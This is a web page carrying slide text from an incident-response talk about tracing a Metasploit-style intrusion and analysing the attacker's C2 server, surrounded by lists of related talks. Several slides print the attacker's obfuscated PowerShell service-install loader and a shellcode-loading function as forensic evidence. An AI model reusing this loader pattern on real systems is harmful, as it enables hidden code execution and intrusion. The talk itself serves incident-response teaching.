Extend Network Visibility and Secure Applications and Data in Azure
 
Combating Insider Threats – Protecting Your Agency from the Inside Out
Combating Insider Threats – Protecting Your Agency from the Inside OutCombating Insider Threats – Protecting Your Agency from the Inside Out
Combating Insider Threats – Protecting Your Agency from the Inside Out
 
Extending Network Visibility: Down to the Endpoint
Extending Network Visibility: Down to the EndpointExtending Network Visibility: Down to the Endpoint
Extending Network Visibility: Down to the Endpoint
 
CrowdCasts Monthly: Mitigating Pass the Hash
CrowdCasts Monthly: Mitigating Pass the HashCrowdCasts Monthly: Mitigating Pass the Hash
CrowdCasts Monthly: Mitigating Pass the Hash
 
Cyber kill chain
Cyber kill chainCyber kill chain
Cyber kill chain
 
Issa jason dablow
Issa jason dablowIssa jason dablow
Issa jason dablow
 

Similar to Honey, I Stole Your C2 Server: A Dive into Attacker Infrastructure

ICS case studies v2
ICS case studies v2ICS case studies v2
ICS case studies v2
Nguyen Binh
 
Analyzing RDP traffc with Bro
Analyzing RDP traffc with BroAnalyzing RDP traffc with Bro
Analyzing RDP traffc with Bro
Josh Liburdi
 
ICS Network Security Monitoring (NSM)
ICS Network Security Monitoring (NSM)ICS Network Security Monitoring (NSM)
ICS Network Security Monitoring (NSM)
Digital Bond
 
WebRTC Infrastructure the Hard Parts: Media
WebRTC Infrastructure the Hard Parts: MediaWebRTC Infrastructure the Hard Parts: Media
WebRTC Infrastructure the Hard Parts: Media
Dialogic Inc.
 
[CB20] Operation Chimera - APT Operation Targets Semiconductor Vendors by CK ...
[CB20] Operation Chimera - APT Operation Targets Semiconductor Vendors by CK ...[CB20] Operation Chimera - APT Operation Targets Semiconductor Vendors by CK ...
[CB20] Operation Chimera - APT Operation Targets Semiconductor Vendors by CK ...
CODE BLUE
 
Microservices with Node.js and Apache Cassandra
Microservices with Node.js and Apache CassandraMicroservices with Node.js and Apache Cassandra
Microservices with Node.js and Apache Cassandra
Jorge Bay Gondra
 
Server-side WebRTC Infrastructure
Server-side WebRTC InfrastructureServer-side WebRTC Infrastructure
Server-side WebRTC Infrastructure
Dialogic Inc.
 
Botnet Detection And Countermeasures
Botnet Detection And CountermeasuresBotnet Detection And Countermeasures
Botnet Detection And Countermeasures
Synerzip
 
[cb22] Fight Against Malware Development Life Cycle by Shusei Tomonaga and Yu...
[cb22] Fight Against Malware Development Life Cycle by Shusei Tomonaga and Yu...[cb22] Fight Against Malware Development Life Cycle by Shusei Tomonaga and Yu...
[cb22] Fight Against Malware Development Life Cycle by Shusei Tomonaga and Yu...
CODE BLUE
 
Web rtc infrastructure the hard parts v4
Web rtc infrastructure the hard parts v4Web rtc infrastructure the hard parts v4
Web rtc infrastructure the hard parts v4
Dialogic Inc.
 
Using hypervisor and container technology to increase datacenter security pos...
Using hypervisor and container technology to increase datacenter security pos...Using hypervisor and container technology to increase datacenter security pos...
Using hypervisor and container technology to increase datacenter security pos...
Black Duck by Synopsys
 
Using hypervisor and container technology to increase datacenter security pos...
Using hypervisor and container technology to increase datacenter security pos...Using hypervisor and container technology to increase datacenter security pos...
Using hypervisor and container technology to increase datacenter security pos...
Tim Mackey
 
2016, A new era of OS and Cloud Security
2016, A new era of OS and Cloud Security2016, A new era of OS and Cloud Security
2016, A new era of OS and Cloud Security
Tudor Damian
 
Putting WebRTC Media in the Cloud
Putting WebRTC Media in the CloudPutting WebRTC Media in the Cloud
Putting WebRTC Media in the Cloud
Dialogic Inc.
 
2016, A New Era of OS and Cloud Security - Tudor Damian
2016, A New Era of OS and Cloud Security - Tudor Damian2016, A New Era of OS and Cloud Security - Tudor Damian
2016, A New Era of OS and Cloud Security - Tudor Damian
ITCamp
 
Making Threat Management More Manageable
Making Threat Management More ManageableMaking Threat Management More Manageable
Making Threat Management More Manageable
IBM Security
 
CrowdCasts Monthly: Going Beyond the Indicator
CrowdCasts Monthly: Going Beyond the IndicatorCrowdCasts Monthly: Going Beyond the Indicator
CrowdCasts Monthly: Going Beyond the Indicator
CrowdStrike
 
Amazon GuardDuty - Let's Attack My Account! - AWS Online Tech Talks
Amazon GuardDuty - Let's Attack My Account! - AWS Online Tech TalksAmazon GuardDuty - Let's Attack My Account! - AWS Online Tech Talks
Amazon GuardDuty - Let's Attack My Account! - AWS Online Tech Talks
Amazon Web Services
 
Day 2 Dns Cert 4b Name Server Redirection
Day 2 Dns Cert 4b Name Server RedirectionDay 2 Dns Cert 4b Name Server Redirection
Day 2 Dns Cert 4b Name Server Redirection
vngundi
 
Protecting the Software-Defined Data Center from Data Breach
Protecting the Software-Defined Data Center from Data BreachProtecting the Software-Defined Data Center from Data Breach
Protecting the Software-Defined Data Center from Data Breach
CA Technologies
 

Similar to Honey, I Stole Your C2 Server: A Dive into Attacker Infrastructure (20)

ICS case studies v2
ICS case studies v2ICS case studies v2
ICS case studies v2
 
Analyzing RDP traffc with Bro
Analyzing RDP traffc with BroAnalyzing RDP traffc with Bro
Analyzing RDP traffc with Bro
 
ICS Network Security Monitoring (NSM)
ICS Network Security Monitoring (NSM)ICS Network Security Monitoring (NSM)
ICS Network Security Monitoring (NSM)
 
WebRTC Infrastructure the Hard Parts: Media
WebRTC Infrastructure the Hard Parts: MediaWebRTC Infrastructure the Hard Parts: Media
WebRTC Infrastructure the Hard Parts: Media
 
[CB20] Operation Chimera - APT Operation Targets Semiconductor Vendors by CK ...
[CB20] Operation Chimera - APT Operation Targets Semiconductor Vendors by CK ...[CB20] Operation Chimera - APT Operation Targets Semiconductor Vendors by CK ...
[CB20] Operation Chimera - APT Operation Targets Semiconductor Vendors by CK ...
 
Microservices with Node.js and Apache Cassandra
Microservices with Node.js and Apache CassandraMicroservices with Node.js and Apache Cassandra
Microservices with Node.js and Apache Cassandra
 
Server-side WebRTC Infrastructure
Server-side WebRTC InfrastructureServer-side WebRTC Infrastructure
Server-side WebRTC Infrastructure
 
Botnet Detection And Countermeasures
Botnet Detection And CountermeasuresBotnet Detection And Countermeasures
Botnet Detection And Countermeasures
 
[cb22] Fight Against Malware Development Life Cycle by Shusei Tomonaga and Yu...
[cb22] Fight Against Malware Development Life Cycle by Shusei Tomonaga and Yu...[cb22] Fight Against Malware Development Life Cycle by Shusei Tomonaga and Yu...
[cb22] Fight Against Malware Development Life Cycle by Shusei Tomonaga and Yu...
 
Web rtc infrastructure the hard parts v4
Web rtc infrastructure the hard parts v4Web rtc infrastructure the hard parts v4
Web rtc infrastructure the hard parts v4
 
Using hypervisor and container technology to increase datacenter security pos...
Using hypervisor and container technology to increase datacenter security pos...Using hypervisor and container technology to increase datacenter security pos...
Using hypervisor and container technology to increase datacenter security pos...
 
Using hypervisor and container technology to increase datacenter security pos...
Using hypervisor and container technology to increase datacenter security pos...Using hypervisor and container technology to increase datacenter security pos...
Using hypervisor and container technology to increase datacenter security pos...
 
2016, A new era of OS and Cloud Security
2016, A new era of OS and Cloud Security2016, A new era of OS and Cloud Security
2016, A new era of OS and Cloud Security
 
Putting WebRTC Media in the Cloud
Putting WebRTC Media in the CloudPutting WebRTC Media in the Cloud
Putting WebRTC Media in the Cloud
 
2016, A New Era of OS and Cloud Security - Tudor Damian
2016, A New Era of OS and Cloud Security - Tudor Damian2016, A New Era of OS and Cloud Security - Tudor Damian
2016, A New Era of OS and Cloud Security - Tudor Damian
 
Making Threat Management More Manageable
Making Threat Management More ManageableMaking Threat Management More Manageable
Making Threat Management More Manageable
 
CrowdCasts Monthly: Going Beyond the Indicator
CrowdCasts Monthly: Going Beyond the IndicatorCrowdCasts Monthly: Going Beyond the Indicator
CrowdCasts Monthly: Going Beyond the Indicator
 
Amazon GuardDuty - Let's Attack My Account! - AWS Online Tech Talks
Amazon GuardDuty - Let's Attack My Account! - AWS Online Tech TalksAmazon GuardDuty - Let's Attack My Account! - AWS Online Tech Talks
Amazon GuardDuty - Let's Attack My Account! - AWS Online Tech Talks
 
Day 2 Dns Cert 4b Name Server Redirection
Day 2 Dns Cert 4b Name Server RedirectionDay 2 Dns Cert 4b Name Server Redirection
Day 2 Dns Cert 4b Name Server Redirection
 
Protecting the Software-Defined Data Center from Data Breach
Protecting the Software-Defined Data Center from Data BreachProtecting the Software-Defined Data Center from Data Breach
Protecting the Software-Defined Data Center from Data Breach
 

More from Shakacon

Web (dis)assembly
Web (dis)assemblyWeb (dis)assembly
Web (dis)assembly
Shakacon
 
Macdoored
MacdooredMacdoored
Macdoored
Shakacon
 
I can be apple and so can you
I can be apple and so can youI can be apple and so can you
I can be apple and so can you
Shakacon
 
Cloud forensics putting the bits back together
Cloud forensics putting the bits back togetherCloud forensics putting the bits back together
Cloud forensics putting the bits back together
Shakacon
 
Pwned in Translation - from Subtitles to RCE
Pwned in Translation - from Subtitles to RCEPwned in Translation - from Subtitles to RCE
Pwned in Translation - from Subtitles to RCE
Shakacon
 
Oversight: Exposing spies on macOS
Oversight: Exposing spies on macOS Oversight: Exposing spies on macOS
Oversight: Exposing spies on macOS
Shakacon
 
Modern Reconnaissance Phase on APT - protection layer
Modern Reconnaissance Phase on APT - protection layerModern Reconnaissance Phase on APT - protection layer
Modern Reconnaissance Phase on APT - protection layer
Shakacon
 
A Decompiler for Blackhain-Based Smart Contracts Bytecode
A Decompiler for Blackhain-Based Smart Contracts BytecodeA Decompiler for Blackhain-Based Smart Contracts Bytecode
A Decompiler for Blackhain-Based Smart Contracts Bytecode
Shakacon
 
Dock ir incident response in a containerized, immutable, continually deploy...
Dock ir incident response in a containerized, immutable, continually deploy...Dock ir incident response in a containerized, immutable, continually deploy...
Dock ir incident response in a containerized, immutable, continually deploy...
Shakacon
 
Reviewing the Security of ASoC Drivers in Android Kernel
Reviewing the Security of ASoC Drivers in Android KernelReviewing the Security of ASoC Drivers in Android Kernel
Reviewing the Security of ASoC Drivers in Android Kernel
Shakacon
 
Silent Protest: A Wearable Protest Network
Silent Protest: A Wearable Protest NetworkSilent Protest: A Wearable Protest Network
Silent Protest: A Wearable Protest Network
Shakacon
 
WiFi-Based IMSI Catcher
WiFi-Based IMSI CatcherWiFi-Based IMSI Catcher
WiFi-Based IMSI Catcher
Shakacon
 
Sad Panda Analysts: Devolving Malware
Sad Panda Analysts: Devolving MalwareSad Panda Analysts: Devolving Malware
Sad Panda Analysts: Devolving Malware
Shakacon
 
reductio [ad absurdum]
reductio [ad absurdum]reductio [ad absurdum]
reductio [ad absurdum]
Shakacon
 
XFLTReat: a new dimension in tunnelling
XFLTReat: a new dimension in tunnellingXFLTReat: a new dimension in tunnelling
XFLTReat: a new dimension in tunnelling
Shakacon
 
Windows Systems & Code Signing Protection by Paul Rascagneres
Windows Systems & Code Signing Protection by Paul RascagneresWindows Systems & Code Signing Protection by Paul Rascagneres
Windows Systems & Code Signing Protection by Paul Rascagneres
Shakacon
 
When Encryption is Not Enough...Sumanth Naropanth, Chandra Prakash Gopalaiah ...
When Encryption is Not Enough...Sumanth Naropanth, Chandra Prakash Gopalaiah ...When Encryption is Not Enough...Sumanth Naropanth, Chandra Prakash Gopalaiah ...
When Encryption is Not Enough...Sumanth Naropanth, Chandra Prakash Gopalaiah ...
Shakacon
 
The Search for the Perfect Door - Deviant Ollam
The Search for the Perfect Door - Deviant OllamThe Search for the Perfect Door - Deviant Ollam
The Search for the Perfect Door - Deviant Ollam
Shakacon
 
Swift Reversing by Ryan Stortz
Swift Reversing by Ryan StortzSwift Reversing by Ryan Stortz
Swift Reversing by Ryan Stortz
Shakacon
 
Making a Scalable Automated Hacking System by Artem Dinaburg
Making a Scalable Automated Hacking System by Artem DinaburgMaking a Scalable Automated Hacking System by Artem Dinaburg
Making a Scalable Automated Hacking System by Artem Dinaburg
Shakacon
 

More from Shakacon (20)

Web (dis)assembly
Web (dis)assemblyWeb (dis)assembly
Web (dis)assembly
 
Macdoored
MacdooredMacdoored
Macdoored
 
I can be apple and so can you
I can be apple and so can youI can be apple and so can you
I can be apple and so can you
 
Cloud forensics putting the bits back together
Cloud forensics putting the bits back togetherCloud forensics putting the bits back together
Cloud forensics putting the bits back together
 
Pwned in Translation - from Subtitles to RCE
Pwned in Translation - from Subtitles to RCEPwned in Translation - from Subtitles to RCE
Pwned in Translation - from Subtitles to RCE
 
Oversight: Exposing spies on macOS
Oversight: Exposing spies on macOS Oversight: Exposing spies on macOS
Oversight: Exposing spies on macOS
 
Modern Reconnaissance Phase on APT - protection layer
Modern Reconnaissance Phase on APT - protection layerModern Reconnaissance Phase on APT - protection layer
Modern Reconnaissance Phase on APT - protection layer
 
A Decompiler for Blackhain-Based Smart Contracts Bytecode
A Decompiler for Blackhain-Based Smart Contracts BytecodeA Decompiler for Blackhain-Based Smart Contracts Bytecode
A Decompiler for Blackhain-Based Smart Contracts Bytecode
 
Dock ir incident response in a containerized, immutable, continually deploy...
Dock ir incident response in a containerized, immutable, continually deploy...Dock ir incident response in a containerized, immutable, continually deploy...
Dock ir incident response in a containerized, immutable, continually deploy...
 
Reviewing the Security of ASoC Drivers in Android Kernel
Reviewing the Security of ASoC Drivers in Android KernelReviewing the Security of ASoC Drivers in Android Kernel
Reviewing the Security of ASoC Drivers in Android Kernel
 
Silent Protest: A Wearable Protest Network
Silent Protest: A Wearable Protest NetworkSilent Protest: A Wearable Protest Network
Silent Protest: A Wearable Protest Network
 
WiFi-Based IMSI Catcher
WiFi-Based IMSI CatcherWiFi-Based IMSI Catcher
WiFi-Based IMSI Catcher
 
Sad Panda Analysts: Devolving Malware
Sad Panda Analysts: Devolving MalwareSad Panda Analysts: Devolving Malware
Sad Panda Analysts: Devolving Malware
 
reductio [ad absurdum]
reductio [ad absurdum]reductio [ad absurdum]
reductio [ad absurdum]
 
XFLTReat: a new dimension in tunnelling
XFLTReat: a new dimension in tunnellingXFLTReat: a new dimension in tunnelling
XFLTReat: a new dimension in tunnelling
 
Windows Systems & Code Signing Protection by Paul Rascagneres
Windows Systems & Code Signing Protection by Paul RascagneresWindows Systems & Code Signing Protection by Paul Rascagneres
Windows Systems & Code Signing Protection by Paul Rascagneres
 
When Encryption is Not Enough...Sumanth Naropanth, Chandra Prakash Gopalaiah ...
When Encryption is Not Enough...Sumanth Naropanth, Chandra Prakash Gopalaiah ...When Encryption is Not Enough...Sumanth Naropanth, Chandra Prakash Gopalaiah ...
When Encryption is Not Enough...Sumanth Naropanth, Chandra Prakash Gopalaiah ...
 
The Search for the Perfect Door - Deviant Ollam
The Search for the Perfect Door - Deviant OllamThe Search for the Perfect Door - Deviant Ollam
The Search for the Perfect Door - Deviant Ollam
 
Swift Reversing by Ryan Stortz
Swift Reversing by Ryan StortzSwift Reversing by Ryan Stortz
Swift Reversing by Ryan Stortz
 
Making a Scalable Automated Hacking System by Artem Dinaburg
Making a Scalable Automated Hacking System by Artem DinaburgMaking a Scalable Automated Hacking System by Artem Dinaburg
Making a Scalable Automated Hacking System by Artem Dinaburg
 

Recently uploaded

Best 20 SEO Techniques To Improve Website Visibility In SERP
Best 20 SEO Techniques To Improve Website Visibility In SERPBest 20 SEO Techniques To Improve Website Visibility In SERP
Best 20 SEO Techniques To Improve Website Visibility In SERP
Pixlogix Infotech
 
Project Management Semester Long Project - Acuity
Project Management Semester Long Project - AcuityProject Management Semester Long Project - Acuity
Project Management Semester Long Project - Acuity
jpupo2018
 
Presentation of the OECD Artificial Intelligence Review of Germany
Presentation of the OECD Artificial Intelligence Review of GermanyPresentation of the OECD Artificial Intelligence Review of Germany
Presentation of the OECD Artificial Intelligence Review of Germany
innovationoecd
 
June Patch Tuesday
June Patch TuesdayJune Patch Tuesday
June Patch Tuesday
Ivanti
 
Monitoring and Managing Anomaly Detection on OpenShift.pdf
Monitoring and Managing Anomaly Detection on OpenShift.pdfMonitoring and Managing Anomaly Detection on OpenShift.pdf
Monitoring and Managing Anomaly Detection on OpenShift.pdf
Tosin Akinosho
 
Choosing The Best AWS Service For Your Website + API.pptx
Choosing The Best AWS Service For Your Website + API.pptxChoosing The Best AWS Service For Your Website + API.pptx
Choosing The Best AWS Service For Your Website + API.pptx
Brandon Minnick, MBA
 
HCL Notes und Domino Lizenzkostenreduzierung in der Welt von DLAU
HCL Notes und Domino Lizenzkostenreduzierung in der Welt von DLAUHCL Notes und Domino Lizenzkostenreduzierung in der Welt von DLAU
HCL Notes und Domino Lizenzkostenreduzierung in der Welt von DLAU
panagenda
 
Mariano G Tinti - Decoding SpaceX
Mariano G Tinti - Decoding SpaceXMariano G Tinti - Decoding SpaceX
Mariano G Tinti - Decoding SpaceX
Mariano Tinti
 
Let's Integrate MuleSoft RPA, COMPOSER, APM with AWS IDP along with Slack
Let's Integrate MuleSoft RPA, COMPOSER, APM with AWS IDP along with SlackLet's Integrate MuleSoft RPA, COMPOSER, APM with AWS IDP along with Slack
Let's Integrate MuleSoft RPA, COMPOSER, APM with AWS IDP along with Slack
shyamraj55
 
HCL Notes and Domino License Cost Reduction in the World of DLAU
HCL Notes and Domino License Cost Reduction in the World of DLAUHCL Notes and Domino License Cost Reduction in the World of DLAU
HCL Notes and Domino License Cost Reduction in the World of DLAU
panagenda
 
Programming Foundation Models with DSPy - Meetup Slides
Programming Foundation Models with DSPy - Meetup SlidesProgramming Foundation Models with DSPy - Meetup Slides
Programming Foundation Models with DSPy - Meetup Slides
Zilliz
 
TrustArc Webinar - 2024 Global Privacy Survey
TrustArc Webinar - 2024 Global Privacy SurveyTrustArc Webinar - 2024 Global Privacy Survey
TrustArc Webinar - 2024 Global Privacy Survey
TrustArc
 
Nordic Marketo Engage User Group_June 13_ 2024.pptx
Nordic Marketo Engage User Group_June 13_ 2024.pptxNordic Marketo Engage User Group_June 13_ 2024.pptx
Nordic Marketo Engage User Group_June 13_ 2024.pptx
MichaelKnudsen27
 
Fueling AI with Great Data with Airbyte Webinar
Fueling AI with Great Data with Airbyte WebinarFueling AI with Great Data with Airbyte Webinar
Fueling AI with Great Data with Airbyte Webinar
Zilliz
 
Ocean lotus Threat actors project by John Sitima 2024 (1).pptx
Ocean lotus Threat actors project by John Sitima 2024 (1).pptxOcean lotus Threat actors project by John Sitima 2024 (1).pptx
Ocean lotus Threat actors project by John Sitima 2024 (1).pptx
SitimaJohn
 
Skybuffer SAM4U tool for SAP license adoption
Skybuffer SAM4U tool for SAP license adoptionSkybuffer SAM4U tool for SAP license adoption
Skybuffer SAM4U tool for SAP license adoption
Tatiana Kojar
 
Driving Business Innovation: Latest Generative AI Advancements & Success Story
Driving Business Innovation: Latest Generative AI Advancements & Success StoryDriving Business Innovation: Latest Generative AI Advancements & Success Story
Driving Business Innovation: Latest Generative AI Advancements & Success Story
Safe Software
 
AI 101: An Introduction to the Basics and Impact of Artificial Intelligence
AI 101: An Introduction to the Basics and Impact of Artificial IntelligenceAI 101: An Introduction to the Basics and Impact of Artificial Intelligence
AI 101: An Introduction to the Basics and Impact of Artificial Intelligence
IndexBug
 
How to use Firebase Data Connect For Flutter
How to use Firebase Data Connect For FlutterHow to use Firebase Data Connect For Flutter
How to use Firebase Data Connect For Flutter
Daiki Mogmet Ito
 
WeTestAthens: Postman's AI & Automation Techniques
WeTestAthens: Postman's AI & Automation TechniquesWeTestAthens: Postman's AI & Automation Techniques
WeTestAthens: Postman's AI & Automation Techniques
Postman
 

Recently uploaded (20)

Best 20 SEO Techniques To Improve Website Visibility In SERP
Best 20 SEO Techniques To Improve Website Visibility In SERPBest 20 SEO Techniques To Improve Website Visibility In SERP
Best 20 SEO Techniques To Improve Website Visibility In SERP
 
Project Management Semester Long Project - Acuity
Project Management Semester Long Project - AcuityProject Management Semester Long Project - Acuity
Project Management Semester Long Project - Acuity
 
Presentation of the OECD Artificial Intelligence Review of Germany
Presentation of the OECD Artificial Intelligence Review of GermanyPresentation of the OECD Artificial Intelligence Review of Germany
Presentation of the OECD Artificial Intelligence Review of Germany
 
June Patch Tuesday
June Patch TuesdayJune Patch Tuesday
June Patch Tuesday
 
Monitoring and Managing Anomaly Detection on OpenShift.pdf
Monitoring and Managing Anomaly Detection on OpenShift.pdfMonitoring and Managing Anomaly Detection on OpenShift.pdf
Monitoring and Managing Anomaly Detection on OpenShift.pdf
 
Choosing The Best AWS Service For Your Website + API.pptx
Choosing The Best AWS Service For Your Website + API.pptxChoosing The Best AWS Service For Your Website + API.pptx
Choosing The Best AWS Service For Your Website + API.pptx
 
HCL Notes und Domino Lizenzkostenreduzierung in der Welt von DLAU
HCL Notes und Domino Lizenzkostenreduzierung in der Welt von DLAUHCL Notes und Domino Lizenzkostenreduzierung in der Welt von DLAU
HCL Notes und Domino Lizenzkostenreduzierung in der Welt von DLAU
 
Mariano G Tinti - Decoding SpaceX
Mariano G Tinti - Decoding SpaceXMariano G Tinti - Decoding SpaceX
Mariano G Tinti - Decoding SpaceX
 
Let's Integrate MuleSoft RPA, COMPOSER, APM with AWS IDP along with Slack
Let's Integrate MuleSoft RPA, COMPOSER, APM with AWS IDP along with SlackLet's Integrate MuleSoft RPA, COMPOSER, APM with AWS IDP along with Slack
Let's Integrate MuleSoft RPA, COMPOSER, APM with AWS IDP along with Slack
 
HCL Notes and Domino License Cost Reduction in the World of DLAU
HCL Notes and Domino License Cost Reduction in the World of DLAUHCL Notes and Domino License Cost Reduction in the World of DLAU
HCL Notes and Domino License Cost Reduction in the World of DLAU
 
Programming Foundation Models with DSPy - Meetup Slides
Programming Foundation Models with DSPy - Meetup SlidesProgramming Foundation Models with DSPy - Meetup Slides
Programming Foundation Models with DSPy - Meetup Slides
 
TrustArc Webinar - 2024 Global Privacy Survey
TrustArc Webinar - 2024 Global Privacy SurveyTrustArc Webinar - 2024 Global Privacy Survey
TrustArc Webinar - 2024 Global Privacy Survey
 
Nordic Marketo Engage User Group_June 13_ 2024.pptx
Nordic Marketo Engage User Group_June 13_ 2024.pptxNordic Marketo Engage User Group_June 13_ 2024.pptx
Nordic Marketo Engage User Group_June 13_ 2024.pptx
 
Fueling AI with Great Data with Airbyte Webinar
Fueling AI with Great Data with Airbyte WebinarFueling AI with Great Data with Airbyte Webinar
Fueling AI with Great Data with Airbyte Webinar
 
Ocean lotus Threat actors project by John Sitima 2024 (1).pptx
Ocean lotus Threat actors project by John Sitima 2024 (1).pptxOcean lotus Threat actors project by John Sitima 2024 (1).pptx
Ocean lotus Threat actors project by John Sitima 2024 (1).pptx
 
Skybuffer SAM4U tool for SAP license adoption
Skybuffer SAM4U tool for SAP license adoptionSkybuffer SAM4U tool for SAP license adoption
Skybuffer SAM4U tool for SAP license adoption
 
Driving Business Innovation: Latest Generative AI Advancements & Success Story
Driving Business Innovation: Latest Generative AI Advancements & Success StoryDriving Business Innovation: Latest Generative AI Advancements & Success Story
Driving Business Innovation: Latest Generative AI Advancements & Success Story
 
AI 101: An Introduction to the Basics and Impact of Artificial Intelligence
AI 101: An Introduction to the Basics and Impact of Artificial IntelligenceAI 101: An Introduction to the Basics and Impact of Artificial Intelligence
AI 101: An Introduction to the Basics and Impact of Artificial Intelligence
 
How to use Firebase Data Connect For Flutter
How to use Firebase Data Connect For FlutterHow to use Firebase Data Connect For Flutter
How to use Firebase Data Connect For Flutter
 
WeTestAthens: Postman's AI & Automation Techniques
WeTestAthens: Postman's AI & Automation TechniquesWeTestAthens: Postman's AI & Automation Techniques
WeTestAthens: Postman's AI & Automation Techniques
 

Honey, I Stole Your C2 Server: A Dive into Attacker Infrastructure

  • 1. 1© Mandiant, a FireEye Company. All rights reserved. CONFIDENTIAL© Mandiant, a FireEye Company. All rights reserved. CONFIDENTIAL Honey, I Stole Your C2 Server A Dive Into Attacker Infrastructure
  • 2. 2© Mandiant, a FireEye Company. All rights reserved. CONFIDENTIAL About Me • Senior Consultant – Mandiant, a FireEye Company • Focus on incident response • Email: andrew.rector@mandiant.com • Twitter: @andy_rektor
  • 3. 3© Mandiant, a FireEye Company. All rights reserved. CONFIDENTIAL Agenda  Summary of an enterprise investigation  Analysis of a Command and Control (C2) server  PostGrok: A post-mortem Python project
  • 4. 4© Mandiant, a FireEye Company. All rights reserved. CONFIDENTIAL© Mandiant, a FireEye Company. All rights reserved. CONFIDENTIAL SUMMARY OF THE ATTACK
  • 5. 5© Mandiant, a FireEye Company. All rights reserved. CONFIDENTIAL A Typical Mandiant Investigation  Client calls  Deploy technology  Find evil, solve crime  Eradicate the attacker  Post-remediation monitoring  Sayonara
  • 6. 6© Mandiant, a FireEye Company. All rights reserved. CONFIDENTIAL This Investigation  Standard beginning to any investigation… - Fortune 500 financial client contacts Mandiant - September 2016 - Identified “strange” service installations…
  • 7. 7© Mandiant, a FireEye Company. All rights reserved. CONFIDENTIAL Investigation Details 7045 | Information | A service was installed in the system. Service Name: NlCDHxYwMDHIOjtS Service File Name: %COMSPEC% /C start %COMSPEC% /C powershell.exe -NoE -NoP -NonI - ExecutionPolicy Bypass -C "sal a New-Object;iex(a IO.StreamReader((a IO.Compression.DeflateStream([IO.MemoryStream][Co nvert]::FromBase64String(“SSByZWFsbHkgaG9wZSB5b3W SdmUgbWlzc2VkIG1lIGEgbG90LiBUaG91Z2ggSSBzZWUgdGhl eSBkaWRuknQgbGV0IHlvdSBmb3JnZXQgbXkgbmFt…==”)
  • 8. 8© Mandiant, a FireEye Company. All rights reserved. CONFIDENTIAL Investigation Details 7045 | Information | A service was installed in the system. Service Name: NlCDHxYwMDHIOjtS Service File Name: %COMSPEC% /C start %COMSPEC% /C powershell.exe -NoE -NoP -NonI - ExecutionPolicy Bypass -C "sal a New-Object;iex(a IO.StreamReader((a IO.Compression.DeflateStream([IO.MemoryStream][Co nvert]::FromBase64String(“SSByZWFsbHkgaG9wZSB5b3W SdmUgbWlzc2VkIG1lIGEgbG90LiBUaG91Z2ggSSBzZWUgdGhl eSBkaWRuknQgbGV0IHlvdSBmb3JnZXQgbXkgbmFt…==”)
  • 9. 9© Mandiant, a FireEye Company. All rights reserved. CONFIDENTIAL Investigation Details • Intelligence-led scoping • Metasploit based indicators • Non-standard workstation names • Service installations containing: • %comspec% • PowerShell • Base64 encoding 4624 | Audit Success | An account was successfully logged on. <data> - Network Information: Workstation Name: QmMhuLYFzfNVblK2 Source Network Address: 10.10.10.10 Source Port: 3283 Detailed Authentication Information: Logon Process: NtLmSsp Authentication Package: NTLM Transited Services: - Package Name (NTLM only): NTLM V2 Key Length: 0
  • 10. 10© Mandiant, a FireEye Company. All rights reserved. CONFIDENTIAL Investigation Summary  72 long hours later… - 129 systems Identified - 116 compromised accounts - Initial attack vector identified
  • 11. 11© Mandiant, a FireEye Company. All rights reserved. CONFIDENTIAL© Mandiant, a FireEye Company. All rights reserved. CONFIDENTIAL ANALYSIS OF A C2 SERVER
  • 12. 12© Mandiant, a FireEye Company. All rights reserved. CONFIDENTIAL Two-sided Perspective  The responder’s perspective - Incident response investigation  The attacker’s perspective - Command and Control (C2) server
  • 13. 13© Mandiant, a FireEye Company. All rights reserved. CONFIDENTIAL Back to That Service Installation 7045 | Information | A service was installed in the system. Service Name: NlCDHxYwMDHIOjtS Service File Name: %COMSPEC% /C start %COMSPEC% /C powershell.exe -NoE -NoP -NonI -ExecutionPolicy Bypass -C "sal a New-Object;iex(a IO.StreamReader((a IO.Compression.DeflateStream([IO.MemoryStream][Conv ert]::FromBase64String(“SSByZ…==”);IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.Compre ssionMode]::Decompress))).ReadToEnd();…
  • 14. 14© Mandiant, a FireEye Company. All rights reserved. CONFIDENTIAL Decoding Obfuscated Code  Identify base64 encoded data  Identify compression scheme
  • 15. 15© Mandiant, a FireEye Company. All rights reserved. CONFIDENTIAL Decoding Obfuscated Code 7045 | Information | A service was installed in the system. Service Name: NlCDHxYwMDHIOjtS Service File Name: %COMSPEC% /C start %COMSPEC% /C powershell.exe -NoE -NoP -NonI -ExecutionPolicy Bypass -C "sal a New-Object;iex(a IO.StreamReader((a IO.Compression.DeflateStream([IO.MemoryStream][Conv ert]::FromBase64String(“SSByZ…==”);IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.Compre ssionMode]::Decompress))).ReadToEnd();…
  • 16. 16© Mandiant, a FireEye Company. All rights reserved. CONFIDENTIAL Decoding Obfuscated Code  Decode base64 encoded layer 2 function function pwej6xjR { Param ($oID, $fP4L8tiY5H) $d9V = ([AppDomain]::CurrentDomain.GetAssemblies() | Where- Object { $_.GlobalAssemblyCache -And $_.Location.Split('')[- 1].Equals('System.dll') }).GetType('Microsoft.Win32.UnsafeNativeMethods’) <snipped> [Byte[]]$uGTfyXcU4 = [System.Convert]::FromBase64String("/EiD5PDozAAAAEFRQVBSUVZIMdJlSItS YEiLUhhIi1IgSItyUEgPt0pKTTHJSDHArDxhfAIsIEHByQ1BAcHi7VJBUUiLUiCLQjxI AdBmgXgYCwIPhXIAAACLgIgAAABIhcB0Z0gB0FCLSBhEi0AgSQHQ41ZI…==")
  • 17. 17© Mandiant, a FireEye Company. All rights reserved. CONFIDENTIAL Decoding Obfuscated Code  Disassemble shellcode  Identify network calls  Convert network byte order to ascii
  • 18. 18© Mandiant, a FireEye Company. All rights reserved. CONFIDENTIAL Provide Decoded IP to Client  Provide decoded IP to client C2 IP Address
  • 19. 19© Mandiant, a FireEye Company. All rights reserved. CONFIDENTIAL A Familiar IP  Client recognizes IP owner  Described as a “small time competitor”
  • 20. 20© Mandiant, a FireEye Company. All rights reserved. CONFIDENTIAL Client Asks For C2 Server
  • 21. 21© Mandiant, a FireEye Company. All rights reserved. CONFIDENTIAL Client Receives Entire Server
  • 22. 22© Mandiant, a FireEye Company. All rights reserved. CONFIDENTIAL Mandiant Images Server
  • 23. 23© Mandiant, a FireEye Company. All rights reserved. CONFIDENTIAL Forensic Analysis  Windows Server 2008 - Attacker created their own user account - Privilege escalation and credential harvesting - Best of all… • Downloaded VMWare Workstation • Downloaded Kali Linux ISO • Installed Kali VM – July 2016 • Two months before attack starts
